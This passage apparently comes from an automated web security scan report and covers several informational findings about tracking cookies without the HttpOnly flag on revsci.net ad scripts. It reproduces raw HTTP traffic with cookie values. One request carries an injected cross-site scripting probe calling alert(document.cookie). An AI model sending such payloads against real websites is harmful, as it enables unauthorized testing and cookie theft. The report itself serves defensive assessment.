User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; rtc_qSZK=MLsv7lMucG5r51i93r4IM9TGU8HE2WihBMXGQkSn286NMFwCGETcqMzfbXziKmcrz0rlT3NXbQ2UQPY347g27oCUANSCq8NZjBisn3QA7dNcEnrj5CvIhcVabHvel3/DSTbq/1y+LSORX9Qb6uZ+/xxsqgjGObwCJtl4lmIRkmOq6dknFXic9AzqI7pWtaOhz0lDDVBT+EfLWQtWQim8GH5HVWELDEpJEbLUw6Jg04VvNANMm8nCbZHaeGWCCfCOJbWK/sAxQ5NGzpD8J6ji9kCmwOAU7AzRXpk9EHHa8hTwgWqMFwsDaB5Azfvk7Xq22OLEfgzLVUKiq8n5G0ivSFg4h3SF/AKFKQO20nm04/QvLfz3c+h6IQcDKx9dpliz4vdsDT1sbxJktw7XGFSOZbQ2gK+V9dLFQSs0EnPRWX/E30E=; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c40&0&&4d9e8915&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OFbwIQlbXb0Pblm12emYklQRqSVITAEXBTSyBcnze5Uw5B1RSYogQK6Dav3im0wTfmKqCjPGGhsDO1q5LAweT3++BeZkFWdiVpk+jMNPVmQHpYx8c6H9UiYQ/GoRZHFPBcRukre2FiAIcNjrZbo6RAaXThxD51DLLEndcJCnrZmoHIPwKa4fjr70PXsq0fw/QzyTPMODzqnrRtWnaRpmMzIsk5WvO/XWTwJRgqzvZtu3OBx9c/ojJB91+s52MmUGL/KCcP49D8EkNQcvhsJ6ZEKJBV

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_qSZK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637ir85zA1Wc7IaEiIBFXxvHO1ZKic5ngYCBQF0q7tfEV6W8KaQp8dAvSusER0hEoZjgIoA2FbRoQEvNoVutDtItom6EzbfSVHF/SxGtsi7JLpXBbxV4+nFIdqzXHgEf9oWZ5RJC3ujSffAwU6kkmlxpZkNgKVDxHs2h6ZgtVUmsdob5hq0Nqcqao5UL6XWdwSFR8rKSfMbsG8gfniLsdQ15P92pOZ8689xVwM9TdXl8xvh5pZ53Bf4B9rMpsnF5XtDliFMjvJm7UtpVRSWYz5Z; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:35:42 GMT; Path=/
Set-Cookie: rtc_ucQg=MLsvrlMusR9jJhHokT9c+IVabtHZzAlfbNtEAmBKZKi5zmNwJhnNeeI4S3b9+hGezmW6Ln0geKBlbrcD9OYDgK5xvRPSmd7E1skkGXtt39bVkBro3/pDJa7WtDpg0n9cK4HLy4PHUYL1qMfvwh6zBTmD3Tq9NcAIrEtRlTLPCVbK4plliAKP6Y1urMVfrK62r1eudYR8l3obNBin+Or1YJCSDLQfDawKE9I3kayv/2L6/OC7EWPIBhcON6NJ0bIQqRR3v9/Y746x7pnadu2KsTdZy9q2LOFaWoIJtemMbkH1yuBwAb2guPh/3EOUW7OJX/dQmLFuaLrE4L2+pzoJlemdndndT5pL3c6dEK1xmqH5NqHj7jqZ3mTtgdw9hH6MmWCujWIOFzZ+sL6cffx50HMJYddjfuKz2MX0KrTWut04fMIbTsVx2/63U4IAYZhnA8KXaw==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:35:42 GMT; Path=/
Set-Cookie: NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Sat, 07-May-2011 12:35:42 GMT; Path=/
X-Proc-ms: 26
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:35:41 GMT
Content-Length: 473

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','E05511_10424','D08734_72076','D08734_72077','D08734_72082'
...[SNIP]...
6.142. http://pix04.revsci.net/E05511/b3/0/3/0902121/73563402.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/73563402.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/73563402.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%2526affname%253DWCAX%2526adtag%253DCommunity%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252F%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_Ilq4=MLsv8VUusQ9nplAbh+n6LFsXooeD0nh55ayhItw9Rx7JWLQrtG7pfYySB2GA3Nkt/3vE4EHvXHSrcNbcIO4b8B1jIlcCH5IHgInSD6DlrtrNRklXWU9LpinwxzgwQP187xxpkNoVxqc5g0Ksi0fqu3Z4OZ9TCWukp+fzOTqRG+FbCpZ1lNWeSoRp4pvl4W6xqmQFwWU4O5lq/w84KnkvAlUkVNwOL7pOF2KVroDjGpx3LQL4w25Sc5a38gWgeVY5oBcsSi4lWRF8zflEvKnkkcWc7L2wiv9axAbc68YjzxC5/fI6qGaK7mrUiBp+5iAS38/Ln32j+SV/ehLBUSTYc5NoQpVx9D9jia6uekGvE+AnaQEGnf1161LH/ZBBrd1FkNrqH87szYKBCWcJz1+P0q9PArWGYEMwtIYB5HVWRY34FsNH9AzwMFIeiW+ySqObcbfFPPZWpQi/Pk976Tx24gqtUfcN9vTjpF5mgS/YLbhW; rsi_segs_1000000=pUPFJ0OBb3IQV+XT5RxDK8mbN4dFek0UYHSBgXF1Q2jCL28cRLpw5nFpJLVQX7M6YvuDaPfQA0vCQw39GEcK40FJyvVXvFWOSkvA0VXok/sQMTNpRvi17bSmHua6WA9WZtqLPeFQc5p0QdCc3zuzABcFd6GAYPZ2ezi0szXNt2XGo/EI7zC1W/BVj13fYEHJ0qyIVY2rt0ZGH53OVeXucoR3j/OWz+KNVMeaRwjT0JUszzBtk0k2KSMtfQhkWKQf0f+e0goETYaw3hb2jqlYmCWhoKeInqG7n7nv+o5UIEVcW15FHRXvzD5LEDdm9i4=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_Ilq4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV594t637EICbRNpWU3hmUA+HR+nmR+zdL28cRLrw7OdqtvRQX7M6YvuD6G01f/A+phz9GIcLk0FNznVXs1FOCnfg0VUZcvsQPTvmT/tqUJ5VUxzqzSb3Ao/eR1mU8vfKIj/pHS427/AX6L0pgSX6cn8xycS8eR2CQRzAVoqeD/WDRpLbKCu7CG4DBFboRtypKBI0YmtgiHu4NjZxzHRZeswDWX0PVIxLei629SeRH/9uav4xm3Icck+mB/fhC98ZQdHHNq4P9MrSX5FDdXo/2FXV/MKbYHe9gQfofsCSH7FQ796N8nPo; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:54 GMT; Path=/
Set-Cookie: rtc_Mkjf=MLsv7iUucA5nprADoxMUZ9S30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBOpPrdSk21eU9Lpyn2txgsRP0c/xxljHTX7BOLqY4BgQCs3lhGEmvvtSk5ED4MMDjv8yVDLYK7pDAruXeuMbqWcYC2y8NbEmpQplW1r3QCDBMDKlKs8h8jhookQYAMg5VB8aLCKuUNV2xyc1W3wSgWiH53GskBj+0uPvbr8fL/03M+lmnwVEf4DsM5sw+zuqC6OKjBGhCiv0nZQy4ZVVoDwYqo6mnNRAo7OEEkJiv+bHNiyxW/clLxVJZkkeyyUV8ztAVi+A9zG0+EPcegfMGdz9/Dr32PiBkC/DCFzbz6JSYOyqhoYdpYn7eMNpSOdKL11qZrM6hDRzvlbWawXokjviVqpJEJmq4AbNHzRSYEvAqk8V1vS7MIKaCr4liagD/po7gg; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:54 GMT; Path=/
X-Proc-ms: 25
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:39:53 GMT
Content-Length: 623

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
6.143. http://pix04.revsci.net/E05511/b3/0/3/0902121/806386945.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/806386945.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/806386945.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%2526affname%253DWCAX%2526adtag%253DCommunity%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%253FL%253D408799%25261ae67'-alert(document.cookie)-'3ecbfdbef18%253D1%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18836
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rtc_YFqO=MLsv8SMucD5nprADC+dAdB3TWgyy2mghBM3EFhQOAZ/gWNQv0Gro+BWjQ4EZLeo310XdXThxtQ6zdDA6J56uUqSv9qW8WduZgAsZhQNOpEq375QA5H5xY8WwU0LKdLuKEDsyFgLs2QD8nLdDzO0REKiqyMaZNMAKnMOnxXWEt8BjuZwKECyW0ZU/wYMuLfzoH/xvc6ywJ1W113TC0bnUQuUBso9vh5RFanDIGZ2QiD0apxJXYQJ3YRuQwyAQiH53Gnljo3T2HFXnMDtm7poq+UoB4RO6FWYEuNgDNyjEaq/g47KKpWhKrWKg6d7RzIqaR34ol/UyR6hDqg+9O85GQG43imOZzWup0YgPP+srSHoErx8roGJPP1d+O+kR6HEaauAX4x6nTM+FXHdYj4fjovLuNWTZDP2DZbds4wvJmpLIJZNXcbptyl9/9gulineUIz0/ATSO02q23EcUpGL65sV23BazOIoRQl98h+CXWg/apXs=; rsi_segs_1000000=pUPFJ0OBbwIMV594t637UACbRK61AlFcyDKEJCWvRS7OL2+ds3bE53FpJPW5vrupC8lCswLISBauEYbyX/hCfTUqw71LtFHOSmtg+BAo6syAKjj1Q+3MwQdGXuQjAQurVLzt4AcKK77SO1/JLy4y7xbpvqTI1+mkR40BDnTL/sDBtzWuC+DBP+6C/fB+9lvq/OiNwTC19M87f7Cvk2pPGcvev/mSAnGtT5OeJXXXkkzzpnWPDIH3iQCjcFfTnm3fqwQsqOUG6cJgaaZBH4Mwxdw3cgqajRXyq4WyJPVtmzyuXN0wYbWK8AWwK9WXjw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_YFqO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBLwIMVp94t6n7EICbRMHW82ldyDKEJCWvRcZbnjU8Au83YF/oiTU39v0EpRxSSEboOTyEIwX9GIcLk0FNfgXkx4D/v6War7+H+r9IY3rvMelQolIvMHaMq7diCRdHMsDM/6p5OOiwoKfjwb0+ILnBkSb48lxz2dmgeOmDeIIlf6TBsnqPCZTaXxt0nVI1j2EjFcTvlEh62I4RzXyz4HxSWyeqhp3GwTf3gD1X1cKcfw9Vkted3m9SBzb1KAzZDhf6xHRb0hLVGpypLCTtoHmLn6hjbaaWLcDPH8Cf6vjTqo9GGQZ2AMBj9io=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:48 GMT; Path=/
Set-Cookie: rtc_gPmG=MLsv7iUucA5nphC0/O7vtsjGNyz6AmULA1P4XndTcpIZ23d9qktkSoTcKGKIRpg710XdXThxtQ6zdFY6J95tmRiMY4yJ+sMdgAuenaLFrtrdRk1XWU9LpyjwtxgsQP0c7xxljHTX7BOLqY4xgQCs3lhGEqvHai05ED4MMDju8yVD7ZZtiMBMCGycqLqWcYC2y8NbVOx8Y1eQZ3yd0bUUw+UBsL8TnR7gPwiq0hl4MvT2YUt6oujwzI7qERgLlBVVr1Ckd5Szw9oGgYCZ3DWnFjsmwgyfZdo6malf61CzbVPZNP15BmGAfLkBkmJdnLDpC2OaS6bXfWondtA/5nZitsDt9iOXeX3L70GPHrFexa6SZ/0SCkkewx/BSDc2GjZn8H9slov9a6d6zjKI3U9d8/YecvDA6McTYIpxuqIYyG+L+BSmfQJVRVXrhI3ic9YEBCUo/esYIrRRnmxZiwg9IE39UhB58WPk2TkadyOOYhgupW0=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:39:48 GMT; Path=/
X-Proc-ms: 32
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:39:48 GMT
Content-Length: 623

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
6.144. http://pix04.revsci.net/E05511/b3/0/3/0902121/871550918.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/871550918.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/871550918.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%2526affname%253DWCAX%2526adtag%253DPolitical%2526conttype%253DS%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
